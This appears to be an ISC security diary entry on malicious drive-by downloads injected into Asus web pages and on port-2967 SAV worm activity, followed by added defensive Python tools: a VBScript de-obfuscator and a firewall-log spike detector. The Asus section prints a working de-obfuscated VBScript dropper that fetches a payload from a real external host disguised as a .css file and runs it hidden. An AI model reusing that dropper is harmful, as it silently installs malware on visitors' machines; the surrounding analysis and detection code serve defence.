Virus spreads from Asus Server
Robert has shared with us a report indicating drive-by downloads injected into Asus pages:
http://www.heise-security.co.uk/news/82643
This is definitely not the first such case. Insecure websites are favourite platforms for attackers to launch attacks from.
Our handler Lenny has de-obfuscated the VBScript that triggered the download:
<html>
<script language="VBScript">
on error resume next
' Each CLSID and ProgID is split into two strings so that a plain-text scan of
' the page does not match them; they are joined with & only when used below.
clID1 = "clsi"
clID2 = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "AdCount.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "http://www.yyc8.com/script/src/rss3.css"
' Instantiate the ActiveX control named by the reassembled CLSID and use it to
' create the helper objects: an HTTP client and a binary stream
Set df = document.createElement("object")
df.setAttribute "classid", clID1&clID2
Set x = df.CreateObject(XML1&XML2,"")
set S = df.createobject(AdoSqa1&AdoSqa2,"")
S.type = 1
' Fetch the payload (the URL ends in .css, but the response is saved and run as a program)
x.Open oGet, dl, False
x.Send
' Write the response body to AdCount.com in the user's temporary folder
' (GetSpecialFolder(2) is the TemporaryFolder constant)
set F = df.createobject(SFO,"")
set tmp = F.GetSpecialFolder(2)
fname1 = F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
' Launch the saved file with a hidden window (last argument 0)
set Q = df.createobject(SApp,"")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>Internet Explorer</title>
</head><body></body>
</html>
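The manual de-obfuscation above can be automated for scripts of this shape. The following is an added example, not code from the diary or from the handler: a small static analyser that records every VBScript variable holding a plain string, inlines the `&` concatenations that reassemble CLSIDs, ProgIDs and URLs, and then flags the object names a defender cares about. The sample script, its variable names and the URL in it are constructed for this demonstration; the CLSID in the indicator list is the one from the diary's script.

```python
"""Resolve split-string obfuscation in VBScript and flag risky object usage.

Added example, not code from the ISC diary: a static analyser for scripts
where CLSIDs, ProgIDs and URLs are split across variables and reassembled
with '&' only at the point of use. The sample script below is constructed.
"""
import re

# Indicators worth surfacing once strings are reassembled. The CLSID is the one
# from the diary's script; the ProgIDs are the objects that script instantiates.
RISKY_INDICATORS = {
    "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36": "ActiveX control used to create the other objects",
    "Microsoft.XMLHTTP": "HTTP download capability",
    "Adodb.Stream": "binary file write capability",
    "Scripting.FileSystemObject": "filesystem access",
    "Shell.Application": "process execution capability",
}

OPERAND = r'(?:"[^"]*"|\w+)'  # a string literal or an identifier
EXPR_RE = re.compile(rf'^\s*{OPERAND}(?:\s*&\s*{OPERAND})*\s*$')
OPERAND_RE = re.compile(OPERAND)
CONCAT_RE = re.compile(rf'{OPERAND}(?:\s*&\s*{OPERAND})*')
ASSIGN_RE = re.compile(r'^\s*(?:set\s+)?(\w+)\s*=\s*(.+?)\s*$', re.IGNORECASE)
URL_RE = re.compile(r'https?://[^\s"]+')


def resolve_expr(expr, strings):
    """Return the literal value of `expr` if it consists only of string
    literals and already-known string variables joined with '&', else None."""
    if not EXPR_RE.match(expr):
        return None
    parts = []
    for tok in OPERAND_RE.findall(expr):
        if tok.startswith('"'):
            parts.append(tok[1:-1])
        elif tok.lower() in strings:  # VBScript identifiers are case-insensitive
            parts.append(strings[tok.lower()])
        else:
            return None
    return "".join(parts)


def collect_strings(script):
    """First pass: record every variable whose value resolves to a string."""
    strings = {}
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            value = resolve_expr(m.group(2), strings)
            if value is not None:
                strings[m.group(1).lower()] = value
    return strings


def substitute(text, strings):
    """Inline every resolvable literal-or-variable expression in `text`."""
    def repl(m):
        value = resolve_expr(m.group(0), strings)
        return m.group(0) if value is None else f'"{value}"'
    return CONCAT_RE.sub(repl, text)


def deobfuscate(script):
    """Second pass: rewrite the script with reassembled strings inlined."""
    strings = collect_strings(script)
    out = []
    for line in script.splitlines():
        if ASSIGN_RE.match(line):
            lhs, rhs = line.split("=", 1)  # leave the assigned name itself alone
            out.append(lhs + "=" + substitute(rhs, strings))
        else:
            out.append(substitute(line, strings))
    return "\n".join(out)


def analyse(script):
    """De-obfuscate, then report matched indicators and any URLs that surface."""
    clear = deobfuscate(script)
    lowered = clear.lower()
    hits = {ind: why for ind, why in RISKY_INDICATORS.items() if ind.lower() in lowered}
    return {"deobfuscated": clear, "indicators": hits, "urls": sorted(set(URL_RE.findall(clear)))}


# Constructed sample in the same shape as the diary's script (placeholder URL).
SAMPLE_VBS = '''on error resume next
a1 = "clsi"
a2 = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
h1 = "Mic"
h2 = "rosoft.XMLHTTP"
s1 = "Adodb.S"
s2 = "tream"
dl = "http://malware.example.invalid/payload.css"
Set df = document.createElement("object")
df.setAttribute "classid", a1&a2
Set x = df.CreateObject(h1&h2,"")
set S = df.createobject(s1&s2,"")
x.Open "GET", dl, False
x.Send'''

if __name__ == "__main__":
    report = analyse(SAMPLE_VBS)
    print(report["deobfuscated"])
    for ind, why in report["indicators"].items():
        print(f"[!] {ind}: {why}")
    print("URLs:", report["urls"])
```

The two-pass design matters: a variable may be assigned early and only concatenated much later, so all string assignments are collected before any line is rewritten. Expressions that involve method calls (for example `F.BuildPath(tmp, fname1)`) are deliberately left untouched rather than guessed at.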
SAV Worm Update
There has been an increase in port 2967 attempts over the last few days, which is associated with the SAV worm:
http://isc.sans.org/port_details.php?port=2967
eEye has a nice technical write-up providing an analysis of this worm. Check it out when you have a free moment.
http://research.eeye.com/html/alerts/AL20061215.html
Symantec has also released virus definitions pertaining to this worm:
Backdoor.Wualess.B
W32.Sagevo
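To see whether the same port 2967 trend is visible on your own perimeter, the following added example (not code from the diary, eEye or Symantec) counts inbound TCP attempts to that port per day from firewall logs, flags a day whose count jumps well above the mean of the preceding days, and lists the noisiest sources. The iptables-style log lines, dates and addresses are constructed for the demonstration.

```python
"""Spot a rise in inbound tcp/2967 connection attempts in perimeter logs.

Added example, not from the ISC diary: a check a defender can run over their
own firewall logs. The iptables-style log lines below are constructed.
"""
import re
from collections import Counter

SAV_PORT = 2967  # Symantec AntiVirus management port targeted by the worm

LOG_RE = re.compile(
    r'^(?P<day>\d{4}-\d{2}-\d{2}) .*?SRC=(?P<src>[\d.]+) .*?PROTO=(?P<proto>\w+) .*?DPT=(?P<dpt>\d+)'
)

# Constructed sample: a quiet baseline, one UDP line that must be ignored, and a spike.
SAMPLE_LOG = """\
2006-12-12 fw kernel: IN=eth0 SRC=198.51.100.7 DST=203.0.113.10 PROTO=TCP SPT=4411 DPT=2967 SYN
2006-12-12 fw kernel: IN=eth0 SRC=198.51.100.8 DST=203.0.113.10 PROTO=TCP SPT=1182 DPT=80 SYN
2006-12-13 fw kernel: IN=eth0 SRC=198.51.100.7 DST=203.0.113.10 PROTO=TCP SPT=4412 DPT=2967 SYN
2006-12-13 fw kernel: IN=eth0 SRC=198.51.100.9 DST=203.0.113.11 PROTO=TCP SPT=3301 DPT=2967 SYN
2006-12-13 fw kernel: IN=eth0 SRC=198.51.100.9 DST=203.0.113.11 PROTO=UDP SPT=3301 DPT=2967
2006-12-14 fw kernel: IN=eth0 SRC=198.51.100.7 DST=203.0.113.10 PROTO=TCP SPT=4413 DPT=2967 SYN
2006-12-14 fw kernel: IN=eth0 SRC=198.51.100.21 DST=203.0.113.10 PROTO=TCP SPT=2050 DPT=2967 SYN
2006-12-14 fw kernel: IN=eth0 SRC=198.51.100.22 DST=203.0.113.12 PROTO=TCP SPT=2051 DPT=2967 SYN
2006-12-15 fw kernel: IN=eth0 SRC=198.51.100.30 DST=203.0.113.10 PROTO=TCP SPT=1030 DPT=2967 SYN
2006-12-15 fw kernel: IN=eth0 SRC=198.51.100.31 DST=203.0.113.10 PROTO=TCP SPT=1031 DPT=2967 SYN
2006-12-15 fw kernel: IN=eth0 SRC=198.51.100.32 DST=203.0.113.11 PROTO=TCP SPT=1032 DPT=2967 SYN
2006-12-15 fw kernel: IN=eth0 SRC=198.51.100.33 DST=203.0.113.11 PROTO=TCP SPT=1033 DPT=2967 SYN
2006-12-15 fw kernel: IN=eth0 SRC=198.51.100.34 DST=203.0.113.12 PROTO=TCP SPT=1034 DPT=2967 SYN
2006-12-15 fw kernel: IN=eth0 SRC=198.51.100.35 DST=203.0.113.12 PROTO=TCP SPT=1035 DPT=2967 SYN
2006-12-15 fw kernel: IN=eth0 SRC=198.51.100.36 DST=203.0.113.13 PROTO=TCP SPT=1036 DPT=2967 SYN
2006-12-15 fw kernel: IN=eth0 SRC=198.51.100.37 DST=203.0.113.13 PROTO=TCP SPT=1037 DPT=2967 SYN
"""


def parse(log_text):
    """Yield (day, src, proto, dport) for every line the regex understands."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m["day"], m["src"], m["proto"].upper(), int(m["dpt"])


def daily_counts(log_text, port=SAV_PORT):
    """Inbound TCP attempts to `port`, counted per day (UDP and other ports ignored)."""
    return Counter(day for day, _, proto, dpt in parse(log_text)
                   if proto == "TCP" and dpt == port)


def flag_increase(counts, factor=3.0):
    """Days whose count is at least `factor` times the mean of all earlier days."""
    flagged, history = [], []
    for day in sorted(counts):
        if history and counts[day] >= factor * (sum(history) / len(history)):
            flagged.append(day)
        history.append(counts[day])
    return flagged


def top_sources(log_text, port=SAV_PORT, n=3):
    """Source addresses with the most TCP attempts to `port`."""
    return Counter(src for _, src, proto, dpt in parse(log_text)
                   if proto == "TCP" and dpt == port).most_common(n)


if __name__ == "__main__":
    counts = daily_counts(SAMPLE_LOG)
    for day in sorted(counts):
        print(day, counts[day])
    print("spike days:", flag_increase(counts))
    print("top sources:", top_sources(SAMPLE_LOG))
```

A rising count of distinct source addresses on one day is the pattern to watch for with a self-propagating worm; a single noisy source scanning the port is a different problem and shows up in the top-sources list instead.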